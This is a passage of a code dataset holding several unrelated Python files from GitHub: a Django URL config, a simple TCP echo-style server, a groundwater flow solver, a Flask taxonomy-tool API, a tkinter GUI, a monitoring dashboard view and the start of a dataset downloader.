name='index'),\n\t#re_path(r'^recalculate/$', views.CalculateView),\n\t#re_path(r'^$', views.IndexView.as_view(), name='index'),\n\tre_path(r'^$', views.IndexView2, name='index'),\n\tre_path(r'^about/$', views.AboutView.as_view(), name='about'),\n\tre_path(r'^rowers/$', RowerList.as_view(), name=\"rower-list\"),\n\tre_path(r'^rowers/(?P<pk>[0-9]+)/$', views.RowerDetail, name=\"rower-detail\"),\n\tre_path(r'^races/$', RaceList.as_view(), name=\"race-list\"),\n\tre_path(r'^races/(?P<pk>[0-9]+)/$', views.RaceDetail, name=\"race-detail\"),\n\tre_path(r'^rankings/$', views.RankingView, name=\"ranking\"),\n\tre_path(r'^competition/$', views.CompetitionView, name=\"comp-list\"),\n\tre_path(r'^competition/(?P<pk>[0-9]+)/$', views.CompetitionResults, name=\"comp-detail\"),\n\tre_path(r'^clubs/$', ClubList.as_view(), name=\"club-list\"),\n\tre_path(r'^clubs/(?P<pk>[0-9]+)/$', views.ClubDetail, name=\"club-detail\"),\n\t#re_path(r'^compare/$', csrf_exempt(views.Compare), name=\"compare-index\"),\n\tre_path(r'^compare/$', views.RowerCompare2, name=\"compare2\"),\n\tre_path(r'^crewcompare/$', views.CrewCompare, name=\"crewcompare\"),\n\tre_path(r'^rowing/hrr/(?P<pk>[0-9]+)/$', views.KnockoutView, name=\"knockouts\"),\n\tre_path(r'^favicon\\.ico$',RedirectView.as_view(url='/static/favicon.ico')),\n    re_path(r'^weather/$', views.WeatherCalc, name=\"weather\"),\n\t#re_path(r'^compare/(?P<pk1>[0-9]+)/(?P<pk2>[0-9]+)/$', views.RowerCompare, name=\"compare\"),\n\t#re_path(r'^rower-autocomplete/$', RowerAutocomplete.as_view(), name=\"rower-autocomplete\"),\n\t#re_path(r'rowerm2m/$', CrewUpdate.as_view(), name=\"crew-update\"),\n\n\t# used in the search function on the rowers view\n\tre_path(r'^rowersearch/$', views.RowerSearch, name=\"rower-search\"),\n\t\n\t# used in autoselect in admin\n\tre_path(r'^ajax_select/', include(ajax_select_urls)),\n]","repo_name":"charlesbarry/rowingstats","sub_path":"rowing/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29356506297","text":"import socket\nimport threading\nimport signal\nimport sys\n\n# Define the IP address and port to listen on\nIP = '0.0.0.0'  # Listen on all available network interfaces\nPORT = 1234  # Port number to listen on\n\n# Global variable to track whether the server should continue running\nserver_running = True\n\n# Function to handle incoming client connections\ndef 
handle_client(client_socket):\n    with client_socket as sock:\n        # Receive data from the client (up to 1024 bytes)\n        request = sock.recv(1024)\n        print(f'[*] Received: {request.decode(\"utf-8\")}')\n\n        # Send a simple acknowledgment back to the client\n        sock.send(b'ACK')\n\n# Signal handler for ctrl+c\ndef signal_handler(sig, frame):\n    global server_running\n    print(\"[*] Exiting server...\")\n    server_running = False\n    sys.exit(0)\n\n# Main function to set up the server\ndef main():\n    # Register the signal handler for ctrl+c\n    signal.signal(signal.SIGINT, signal_handler)\n\n    # Create a socket object using IPv4 and TCP\n    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n    # Bind the socket to the IP and port\n    server.bind((IP, PORT))\n\n    # Listen for incoming connections, allowing up to 5 queued connections\n    server.listen(5)\n    print(f'[*] Listening on {IP}:{PORT}')\n\n    while server_running:\n        try:\n            # Accept an incoming connection, client is a new socket object\n            # and address is the client's address (IP and port)\n            client, address = server.accept()\n            print(f'[*] Accepted connection from {address[0]}:{address[1]}')\n\n            # Create a new thread to handle the client's communication\n            client_handler = threading.Thread(target=handle_client, args=(client,))\n            client_handler.start()\n        except KeyboardInterrupt:\n            # If ctrl+c is pressed during server operation, terminate gracefully\n            print(\"[*] Server interrupted by user.\")\n            server.close()\n            sys.exit(0)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"CaptLevi0408/Black-Hat-Python","sub_path":"Basic Networking Tools/tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"931098669","text":"# An attempt at numerically solving the stochastic groundwater flow equation\nimport random\nfrom scipy.fftpack import fft, ifft\n\nimport numpy as np\nfrom numpy import sin, cos, tan\nimport numpy.linalg as nla\nfrom sympy import symbols\nimport sympy as sy\nimport matplotlib\n\nmatplotlib.use('QtAgg')\nimport matplotlib.pyplot as plt\n\n\nclass Random_flow:\n    def __init__(self):\n        self.ic = None\n        self.tl = None\n        self.st = None\n        self.name_chinese = \"stochastic transient one-dimensional flow\"\n        self.xl = None\n        self.sl = None\n        self.h_r = []\n        self.h_l = []\n        self.B = 1  # the width of the one-dimensional flow defaults to one unit\n\n    def l_boundary(self, h_l, Dirichlet=False, Neumann=False, Robin=False):  # left boundary\n        if Dirichlet:\n            self.h_l = [1, float(h_l)]\n        elif Neumann:\n            self.h_l = [2, float(h_l)]\n\n    def r_boundary(self, h_r, Dirichlet=False, Neumann=False, Robin=False):  # right boundary\n        if Dirichlet:\n            self.h_r = [1, float(h_r)]\n        elif Neumann:\n            self.h_r = [2, float(h_r)]\n\n    def step_length(self, sl):  # difference step size along the X axis\n        self.sl = float(sl)\n\n    def step_time(self, st):  # difference step size along the time axis\n        self.st = float(st)\n\n    def x_length(self, xl):  # total length of the X axis\n        self.xl = float(xl)\n\n    def t_length(self, tl):  # total length of the time axis, in days by convention\n        self.tl = float(tl)\n\n    def initial_condition(self, ic: str):  # head setting of the initial condition\n        self.ic = str(ic)\n\n    def width(self, B):  # width of the aquifer\n        self.B = float(B)\n\n    def draw(self, H_ALL: np.ndarray, time=0, title=''):  # plot the head curve at a given time step\n        # number of cells along the X axis\n        m = int(self.xl / self.sl) + 1\n        # X axis\n        X = np.linspace(0, self.xl, m)\n        # allow CJK characters to render during plotting\n        plt.rcParams['font.sans-serif'] = ['SimHei']\n        # fix minus signs rendering as boxes\n        plt.rcParams['axes.unicode_minus'] = False\n        fig = plt.figure(figsize=(10, 7))\n        ax = fig.add_subplot()\n        ax.plot(X, H_ALL[time], linewidth=1, antialiased=True)\n\n        def maxH_y(h_all):\n            hy = 0\n            for i in h_all:\n                if i > hy:\n                    hy = i\n            return hy\n\n        def 
minH_y(h_all):\n            hy = 0\n            for i in h_all:\n                if i < hy:\n                    hy = i\n            return hy\n\n        ax.set_ylim(minH_y(H_ALL[time]), maxH_y(H_ALL[time]))\n        ax.set(ylabel='Head (m)', xlabel='X axis (m)')\n        plt.suptitle(self.name_chinese)\n        if title == '':\n            plt.title(\"Finite-difference solution at time step {0} (spatial step {1}, time step {2})\".format(time, self.sl, self.st))\n        else:\n            plt.title(title)\n        plt.show()\n\n    def draw_location(self, H_ALL: np.ndarray, location=0, title=''):  # plot the head series at a given location\n        # number of cells along the T axis\n        m = int(self.tl / self.st) + 1\n        # T axis\n        T = np.linspace(0, self.tl, m)\n        # head axis\n        H = []\n        for i in H_ALL:\n            H.append(i[location])\n        # allow CJK characters to render during plotting\n        plt.rcParams['font.sans-serif'] = ['SimHei']\n        # fix minus signs rendering as boxes\n        plt.rcParams['axes.unicode_minus'] = False\n        fig = plt.figure(figsize=(10, 7))\n        ax = fig.add_subplot()\n        ax.plot(T, H, linewidth=1, antialiased=True)\n        ax.set_ylim(min(H) - 1, max(H) + 1)\n        ax.set(ylabel='Head (m)', xlabel='Time axis (d)')\n        plt.suptitle(self.name_chinese)\n        if title == '':\n            plt.title(\"Finite-difference solution at location {0} (spatial step {1}, time step {2})\".format(location, self.sl, self.st))\n        else:\n            plt.title(title)\n        plt.show()\n\n    def draw_surface(self, H_ALL: np.ndarray, title=''):  # plot the solution surface\n        # number of cells along the X axis\n        m = int(self.xl / self.sl) + 1\n        # number of cells along the time axis\n        n = int(self.tl / self.st) + 1\n        # X axis\n        X = np.linspace(0, self.xl, m)\n        # time axis\n        T = np.linspace(0, self.tl, n)\n        # build the coordinate grid\n        X, T = np.meshgrid(X, T)\n        # allow CJK characters to render during plotting\n        plt.rcParams['font.sans-serif'] = ['SimHei']\n        # fix minus signs rendering as boxes\n        plt.rcParams['axes.unicode_minus'] = False\n        fig = plt.figure(figsize=(10, 7))\n        ax = fig.add_subplot(projection='3d')\n\n        def maxH_z(h_all):\n            hz = 0\n            for i in h_all:\n                for j in i:\n                    if j > hz:\n                        hz = j\n            return hz\n\n        def minH_z(h_all):\n            hz = 0\n            for i in h_all:\n                for j in i:\n                    if j < hz:\n                        hz = j\n            return hz\n\n        ax.set_zlim(minH_z(H_ALL), maxH_z(H_ALL))\n        ax.plot_surface(X, T, H_ALL, linewidth=0, antialiased=True, cmap=plt.get_cmap('rainbow'))\n        ax.set(zlabel='Head (m)', ylabel='Time axis (d)', xlabel='X axis (m)')\n        plt.suptitle(self.name_chinese)\n        if title == '':\n            plt.title(\"Finite-difference solution (spatial step {0}, time step {1})\".format(self.sl, self.st))\n        else:\n            plt.title(title)\n        plt.show()\n\n\nclass Random_one_dimension_boussinesq(Random_flow):\n    def __init__(self):\n        super().__init__()\n        self.we = None\n        self.Sy = None\n        self.K = None\n        self.w = None\n        self.a = None\n        self.a_as = None\n        self.ha = None\n        self.name_chinese = 'stochastic transient one-dimensional flow in an unconfined aquifer'\n\n    def reference_thickness(self, ha):  # reference thickness of the unconfined aquifer; the analytical solution linearizes the PDE with the reference-thickness method\n        self.ha = float(ha)\n\n    def pressure_diffusion_coefficient(self, a):  # pressure diffusion coefficient of the unconfined aquifer, equal to conductivity times initial head over specific yield, K*h0/Sy\n        self.a = float(a)\n\n    def source_sink_expectation(self, we):  # expectation of the source/sink term\n        self.we = float(we)\n\n    def source_sink_term(self, w: str):  # source/sink term of the unconfined aquifer; may be a constant or a function such as sin(x) + cos(t)\n        self.w = w\n\n    def fft_source_sink_term(self):  # fast Fourier transform of the source/sink term\n        # number of cells along the time axis\n        n = int(self.tl / self.st) + 1\n        # time axis\n        t = np.linspace(0, self.tl, n)\n        fft_w = fft(eval(self.w))\n        return fft_w\n\n    @staticmethod\n    def fft_location(H_ALL: np.ndarray, location=0):  # fast Fourier transform of the heads at one location across time\n        # discrete heads at the same location over time\n        H = []\n        for i in H_ALL:\n            H.append(i[location])\n        fft_H = fft(H)\n        return fft_H\n\n    def hydraulic_conductivity(self, K):  # hydraulic conductivity of the unconfined aquifer\n        self.K = float(K)\n\n    def specific_yield(self, Sy):  # storage coefficient (specific yield) of the unconfined aquifer\n        self.Sy = float(Sy)\n\n    def random_w(self):\n        # generate a random amplitude\n        amplitude = random.uniform(0, self.we)\n        # generate a random period\n        while True:\n            cycle = self.tl / int(random.uniform(1, 50))  # by the Shannon sampling theorem the sampling frequency must exceed twice the signal frequency\n            if cycle >= 3 * self.st:  # so the random signal period must exceed twice the sampling period; three times is used here\n                break\n        # random frequency\n        frequency = 1 / cycle\n        
return amplitude, cycle, frequency\n\n    def solve(self):\n        # if the pressure diffusion coefficient has not been set\n        if self.a is None or self.a == \"\":\n            self.a = self.K / self.Sy\n        # define the two symbols x and t for 1-D transient flow in an unconfined aquifer\n        x = symbols(\"x\")\n        t = symbols(\"t\")\n        # number of difference nodes along the X axis\n        m = int(self.xl / self.sl) + 1\n        # number of difference nodes along the time axis\n        n = int(self.tl / self.st) + 1\n\n        # the function W(x, t) is defined as the source/sink term divided by the conductivity K\n        def W(x, t):\n            return eval(self.w) / self.K\n\n        # the function IC gives the initial head distribution\n        def IC(x):\n            return eval(self.ic)\n\n        # matrix of zeros that stores the head at every difference node\n        H_ALL = np.zeros((n, m))\n        # constant vector b\n        H_b = np.zeros((m * n, 1))\n        # coefficient matrix a\n        H_a = np.zeros((m * n, m * n))\n        # row index into the coefficient matrix\n\n        # fill in the matrices\n        for k in range(0, n):  # scan the rows (time axis)\n            iteration_times = 0  # iteration counter\n            H_previous_iteration = np.zeros((1, m))\n            # start of the iterative solve\n            while True:\n                H_a = np.zeros((m, m))\n                l_a = 0\n                H_b = np.zeros((m, 1))\n\n                if iteration_times == 0 and k != 0:\n                    H_previous_iteration = H_ALL[k - 1]  # current-step heads from the previous iteration; nothing is computed yet, so approximate with the previous time step\n\n                for i in range(0, m):  # scan the columns (X axis)\n                    # temporal boundary (initial condition)\n                    if k == 0:\n                        H_a[l_a, l_a] = 1\n                        H_b[l_a] = IC(i * self.sl)\n\n                    # left boundary\n                    elif (i - 1) < 0 and self.h_l[0] == 1:  # first-type (Dirichlet) boundary\n                        H_a[l_a, l_a] = 1\n                        H_b[l_a] = self.h_l[1]\n                    elif (i - 1) < 0 and self.h_l[0] == 2:  # second-type (Neumann) boundary\n                        # source/sink term\n                        H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n                            k - 1, i] - 2 * self.sl * self.h_l[1] * (\n                                H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n                                self.sl * self.sl)\n                        # coefficient of the head at (i, k)\n                        H_a[l_a, l_a] = -(H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n                            2 * self.sl * self.sl) - (H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n                            self.sl * self.sl) - self.Sy / (self.K * self.st)\n                        # coefficient of the head at (i+1, k)\n                        H_a[l_a, l_a + 1] = (H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n                            2 * self.sl * self.sl) + (H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n                            self.sl * self.sl)\n\n                    # right boundary\n                    elif (i + 1) == m and self.h_r[0] == 1:\n                        H_a[l_a, l_a] = 1\n                        H_b[l_a] = self.h_r[1]\n                    elif (i + 1) == m and self.h_r[0] == 2:\n                        # source/sink term\n                        H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n                            k - 1, i] + 2 * self.sl * self.h_r[1] * (\n                                H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n                                self.sl * self.sl)\n                        # coefficient of the head at (i, k)\n                        H_a[l_a, l_a] = - (H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n                            self.sl * self.sl) - (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n                            2 * self.sl * self.sl) - self.Sy / (self.K * self.st)\n                        # coefficient of the head at (i-1, k)\n                        H_a[l_a, l_a - 1] = (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n                            2 * self.sl * self.sl) + (H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n                            self.sl * self.sl)\n                    else:  # interior nodes\n                        # source/sink term\n                        H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n                            k - 1, i]\n                        # coefficient of the head at (i, k)\n                        H_a[l_a, l_a] = -(H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n                            2 * self.sl * self.sl) - (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n                            2 * self.sl * self.sl) - self.Sy / (self.K * self.st)\n                        # coefficient of the head at (i-1, k)\n                        H_a[l_a, l_a - 1] = (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n                            2 * self.sl * self.sl)\n                        # coefficient of the head at (i+1, k)\n                        H_a[l_a, l_a + 1] = (H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n                            2 * self.sl * self.sl)\n                    l_a += 1\n\n                H = nla.solve(H_a, H_b)  # solve for the heads of the current time step\n                if k == 0:  # time step zero does not take part in the iteration\n                    break\n\n                # check whether the precision requirement is met\n                precision = 0\n                for u in range(0, m):\n                    if abs(H_previous_iteration[u] - H[u]) > 0.01:\n                        precision = 1\n                if precision 
!= 1:\n                    break\n                else:\n                    iteration_times += 1\n                    H_previous_iteration = H\n\n                if iteration_times > 100:\n                    break\n            for o in range(0, m):  # scan over space and collect the computed heads\n                H_ALL[k, o] = H[o]\n        return H_ALL\n\n\nif __name__ == \"__main__\":\n    flow = Random_one_dimension_boussinesq()\n    flow.sl = 10\n    flow.st = 5\n    flow.ic = '60 + x * np.tan(3.1415/120) + 5 * np.sin(x/60)'\n    flow.tl = 365\n    flow.xl = 2000\n    flow.h_r = [2, 0]\n    flow.h_l = [1, 60]\n    flow.Sy = 0.08\n    flow.K = 10\n    flow.we = 0.4\n    # flow.w = '0'\n    flow.w = '0.4/36 + 0.1/36 * sin(3.1415*t/200) + 0.05/36 * sin(3.1415*t/10)'\n    d = flow.fft_source_sink_term()\n    h = flow.solve()\n    # flow.draw(H_ALL=h, time=0)\n    a, b, c = flow.random_w()\n    # print(a)\n    # print(b)\n    # print(c)\n\n    print(len(d))\n\n    flow.draw_surface(H_ALL=h)\n","repo_name":"YuLei-1005203115/FDM_groundwater","sub_path":"FDMgroundwater/randomflow.py","file_name":"randomflow.py","file_ext":"py","file_size_in_byte":14769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"40409864086","text":"from flask import Flask, jsonify, make_response, url_for, request\nimport pynomer\nfrom datetime import datetime\nimport logging\nimport sys\nimport os\n\napp = Flask(__name__)\n\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setFormatter(\n    logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n)\napp.logger.addHandler(handler)\napp.logger.setLevel(logging.DEBUG)\n\n\n# @app.before_first_request\n# def load_cache():\n#     app.logger.info(\"Clean taxon cache\")\n#     run_nomer(nomer_cmd=get_nomer_simple_cmd(cmd=\"clean\"))\n#     app.logger.info(\"Load taxon cache\")\n#     run_nomer(get_nomer_match_cmd(cmd=\"append\", id=\"GBIF:1\"))\n#     app.logger.info(\"Ready to start server\")\n\n\n@app.route(\"/\")\ndef index():\n    return \"\"\"\n    
<h1>Nomer in Docker!</h1>\n    <p>A web-app for running Nomer inside Docker.</p>
\n \"\"\"\n\n\n@app.route(\"/version\", methods=[\"GET\"])\ndef version():\n \"\"\"\n Show Version.\n \"\"\"\n cmd, result = pynomer.version()\n return get_response(cmd, result)\n\n\n@app.route(\"/clean\", methods=[\"GET\"])\ndef clean():\n \"\"\"\n Cleans term matcher cache.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.clean(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/matchers\", methods=[\"GET\"])\ndef matchers():\n \"\"\"\n Lists supported matcher and (optionally) their descriptions.\n :param o: [\"tsv\", \"json\"] Output format. Default: \"tsv\"\n :param v: [bool] If set, matcher descriptions are included for tsv. Default: False\n \"\"\"\n o = request.args.get(\"o\", \"tsv\")\n v = request.args.get(\"v\", \"\")\n\n cmd, result = pynomer.matchers(output_format=o, verbose=v)\n return get_response(cmd, result)\n\n\n@app.route(\"/replace\", methods=[\"GET\"])\ndef replace():\n \"\"\"\n Replace exact term matches in row. The input schema is used\n to select the id and/or name to match to. The output schema is\n used to select the columns to write into.\n :param query: [string] Query. Default: \n :param matcher: [string] Selected matcher. Default: \"globi-taxon-cache\"\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n\n query = request.args.get(\"query\", \"\")\n matcher = request.args.get(\"matcher\", \"globi-taxon-cache\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n e = False\n\n cmd, result = pynomer.replace(\n query=query, matcher=matcher, properties=p, echo_opt=\"-e\" if e else \"\"\n )\n return get_response(cmd, result)\n\n\n@app.route(\"/append\", methods=[\"GET\"])\ndef append():\n \"\"\"\n Append term match to row using id and name columns specified\n in input schema. Multiple matches result in multiple rows.\n :param query: [string] Query. Default: \n :param matcher: [string] Selected matcher. Default: \"globi-taxon-cache\"\n :param p: [string] Path to properties file to override defaults. Default: None\n :param o: [\"tsv\", \"json\"] Output format. Default: \"tsv\"\n \"\"\"\n query = request.args.get(\"query\", \"\")\n matcher = request.args.get(\"matcher\", \"globi-taxon-cache\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n o = request.args.get(\"o\", \"tsv\")\n e = False\n\n cmd, result = pynomer.append(\n query=query,\n matcher=matcher,\n properties=p,\n output_format=o,\n echo_opt=\"-e\" if e else \"\",\n )\n return get_response(cmd, result)\n\n\n@app.route(\"/input_schema\", methods=[\"GET\"])\ndef input_schema():\n \"\"\"\n Show input schema in JSON.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.input_schema(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/output_schema\", methods=[\"GET\"])\ndef output_schema():\n \"\"\"\n Show output schema.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.output_schema(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/properties\", methods=[\"GET\"])\ndef properties():\n \"\"\"\n Lists configuration properties. 
Can be used to make a local copy and override\n default settings.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.properties(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/validate_term\", methods=[\"GET\"])\ndef validate_term():\n \"\"\"\n Validate terms.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n filepath = request.args.get(\"filepath\", \"\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.validate_term(filepath, properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/validate_term_link\", methods=[\"GET\"])\ndef validate_term_link():\n \"\"\"\n Validate term links.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n filepath = request.args.get(\"filepath\", \"\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.validate_term_link(filepath, properties=p)\n return get_response(cmd, result)\n\n\ndef get_response(cmd, cmd_result):\n headers = {}\n return make_response(\n jsonify(\n {\n \"command\": cmd,\n \"result\": cmd_result,\n \"tstamp\": datetime.utcnow().timestamp(),\n \"endpoints\": {\"url_index\": url_for(\"index\", _external=True)},\n }\n ),\n 200,\n headers,\n )\n\n\ndef get_properties(p):\n p = p if p != \"None\" else None\n if p:\n path = os.path.join(os.getcwd(), \"input_properties\")\n with open(path, \"w\") as f:\n app.logger.debug(f\"Create new file {path} with content {p}\")\n f.write(p)\n return path\n return p\n\n\nif __name__ == \"__main__\":\n pynomer.append(query=\"\\tHomo sapiens\", matcher=\"globi-taxon-cache\")\n app.run(debug=True, host=\"0.0.0.0\", port=\"9090\", threaded=True)\n","repo_name":"nleguillarme/pynomer","sub_path":"pynomer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"15966780973","text":"import tkinter as tk\nfrom tkinter import ttk\n\nfrom GUI_lent import Window as Lent\nfrom GUI_media import Window as Media\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.title(\"Barbara\")\n self.geometry('800x650')\n self.resizable(False, False)\n\n self.tabControl = ttk.Notebook(self)\n self.tab1 = ttk.Frame(self.tabControl)\n self.tab2 = ttk.Frame(self.tabControl)\n\n self.tabControl.add(self.tab1, text='lent')\n self.tabControl.add(self.tab2, text='media')\n self.tabControl.pack(expand=1, fill=\"both\")\n\n self.lent = Lent(self.tab1)\n self.media = Media(self.tab2)\n\n self.lent.pack(fill='x', anchor='s')\n self.media.pack()\n\n\nif __name__=='__main__':\n barbara = App()\n barbara.mainloop()\n","repo_name":"AkitoKay/Barbara","sub_path":"Code/GUI_main.py","file_name":"GUI_main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"32542636287","text":"__author__ = 'niean'\nfrom rrd import app\nfrom flask import request, g, render_template, jsonify\nfrom rrd.model.portal.poly import PolyMetric\nfrom rrd.utils.params import required_chk\nfrom rrd.utils.logger import logging\nfrom rrd.utils.format import replace_str_for_counter\nfrom rrd.config import *\nlog = logging.getLogger(__file__)\n\n\ndef gen_single_poly_grafana_link(grp_p, metric_p):\n '''\n\n 
https://grafana.xxxx.com/d/single_metric_falcon_poly_metric/single_metric_falcon_poly_metric?orgId=1\n    &refresh=1m&var-metric_line=cpu_busy&var-metric=cpu.busy\n    &var-poly_res_sum=poly_res_cpu_busy_sum&var-poly_res_avg=poly_res_cpu_busy_avg\n    # &&var-falcon_poly_name=falcon_group_poly_data_system_openfalcon\n    # &var-grp_name=data_system_openfalcon&\n    # var-prome=falcon_group_data_system_openfalcon&\n    # &var-group_name_point=data.system.openfalcon\n    :return:\n    '''\n    prome_metric = replace_str_for_counter(metric_p.split('/', 1)[0])\n\n    grp_l = replace_str_for_counter(grp_p)\n    metric_l = replace_str_for_counter(metric_p)\n    url = '{}&var-grp_name={}&var-group_name_point={}&var-falcon_poly_name=falcon_group_poly_{}&var-prome=falcon_group_{}&var-poly_res_sum=poly_res_{}_sum&var-poly_res_avg=poly_res_{}_avg&var-metric_line={}&var-metric={}&var-prome_metric={}'.format(\n        GRAFANA_SINGLE_POLY_URL, grp_l, grp_p, grp_l, grp_l, prome_metric, prome_metric, metric_l, metric_p, prome_metric)\n    # print(url)\n    return url\n\n\n@app.route('/portal/poly')\ndef polys_get():\n    page = int(request.args.get('p', 1))\n    limit = int(request.args.get('limit', 20))\n    query = request.args.get('q', '').strip()\n    mine = request.args.get('mine', '1')\n    me = g.user.name if mine == '1' else None\n    vs, total = PolyMetric.query(page, limit, query, me)\n\n    new_vs = []\n    for v in vs:\n        setattr(v, 'g_url', gen_single_poly_grafana_link(v.name, v.counter))\n        new_vs.append(v)\n    return render_template(\n        'portal/poly/list.html',\n        data={\n            # 'vs': vs,\n            'vs': new_vs,\n            'total': total,\n            'query': query,\n            'limit': limit,\n            'page': page,\n            'mine': mine,\n        }\n    )\n\n\n@app.route('/portal/poly/add')\ndef poly_update_get():\n    o = PolyMetric.get(int(request.args.get('poly_id', '0').strip()))\n    return render_template('portal/poly/add.html', data={'poly': o})\n\n\n@app.route('/portal/poly/update', methods=['POST'])\ndef poly_update_post():\n    poly_id = request.form['poly_id'].strip()\n    name = request.form['name'].strip()\n    poly_type = request.form['poly_type'].strip()\n    counter = request.form['counter'].strip()\n    msg = required_chk({\n        'name': name,\n        'poly_type': poly_type,\n        'counter': counter,\n    })\n\n    if msg:\n        return jsonify(msg=msg)\n    name = name.split(\"\\n\")\n    counter = counter.split(\"\\n\")\n    if len(name) == 0 or len(counter) == 0:\n        return jsonify(msg=\"name empty or counter empty\")\n    res = dict()\n    for n in name:\n        if not n:\n            continue\n\n        for c in counter:\n            if not c:\n                continue\n            rr = PolyMetric.save_or_update(\n                poly_id,\n                n,\n                poly_type,\n                c,\n                g.user.name,\n            )\n            if rr:\n                res[\"name_{}_counter_{}\".format(n, c)] = rr\n    if not res:\n        return jsonify(msg='')\n    return jsonify(msg=str(res))\n    # return jsonify(msg=PolyMetric.save_or_update(\n    #     poly_id,\n    #     name,\n    #     poly_type,\n    #     counter,\n    #     g.user.name,\n    # ))\n\n\n@app.route('/portal/poly/delete/<poly_id>')\ndef poly_delete_get(poly_id):\n    poly_id = int(poly_id)\n    PolyMetric.delete_one(poly_id)\n    return jsonify(msg='')\n","repo_name":"ning1875/falcon-dashboard","sub_path":"rrd/view/portal/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"12991148761","text":"from __future__ import annotations\n\nimport logging\nimport os\nfrom pathlib import Path\nfrom typing import Final\n\nimport cv2\nimport requests\n\nDATASET_BASE_URL = \"https://storage.googleapis.com/objectron\"\nLOCAL_DATASET_DIR: Final = Path(os.path.dirname(__file__)) / \"dataset\"\nIMAGE_RESOLUTION: 
Final = (1440, 1920)\nGEOMETRY_FILENAME: Final = \"geometry.pbdata\"\nANNOTATIONS_FILENAME: Final = \"annotation.pbdata\"\nVIDEO_FILENAME: Final = \"video.MOV\"\n\nAVAILABLE_RECORDINGS = [\n \"bike\",\n \"book\",\n \"bottle\",\n \"camera\",\n \"cereal_box\",\n \"chair\",\n \"cup\",\n \"laptop\",\n \"shoe\",\n]\n\n\ndef ensure_downloaded(src_url: str, dst_path: Path) -> None:\n os.makedirs(dst_path.parent, exist_ok=True)\n if not dst_path.exists():\n logging.info(\"Downloading %s to %s\", src_url, dst_path)\n with requests.get(src_url, stream=True) as req:\n req.raise_for_status()\n with open(dst_path, \"wb\") as f:\n for chunk in req.iter_content(chunk_size=8192):\n f.write(chunk)\n\n\ndef find_path_if_downloaded(recording_name: str, local_dataset_dir: Path) -> Path | None:\n local_recording_dir = local_dataset_dir / recording_name\n paths = list(local_recording_dir.glob(f\"**/{ANNOTATIONS_FILENAME}\"))\n if paths:\n return paths[0].parent\n return None\n\n\ndef get_recording_id_from_name(recording_name: str) -> str:\n recording_ids_raw = requests.get(f\"{DATASET_BASE_URL}/v1/index/{recording_name}_annotations_test\").text\n recording_id = recording_ids_raw.split(\"\\n\")[0]\n return recording_id\n\n\ndef ensure_opencv_version_ok() -> None:\n if cv2.getVersionMajor() == 4 and cv2.getVersionMinor() == 6:\n raise RuntimeError(\n \"\"\"Opencv 4.6 contains a bug which will unpack some videos with the incorrect orientation.\n See: https://github.com/opencv/opencv/issues/22088\n Please upgrade or downgrade as appropriate.\"\"\"\n )\n\n\ndef ensure_recording_downloaded(recording_name: str, dataset_dir: Path) -> Path:\n \"\"\"\n Makes sure the recording is downloaded.\n\n Returns the 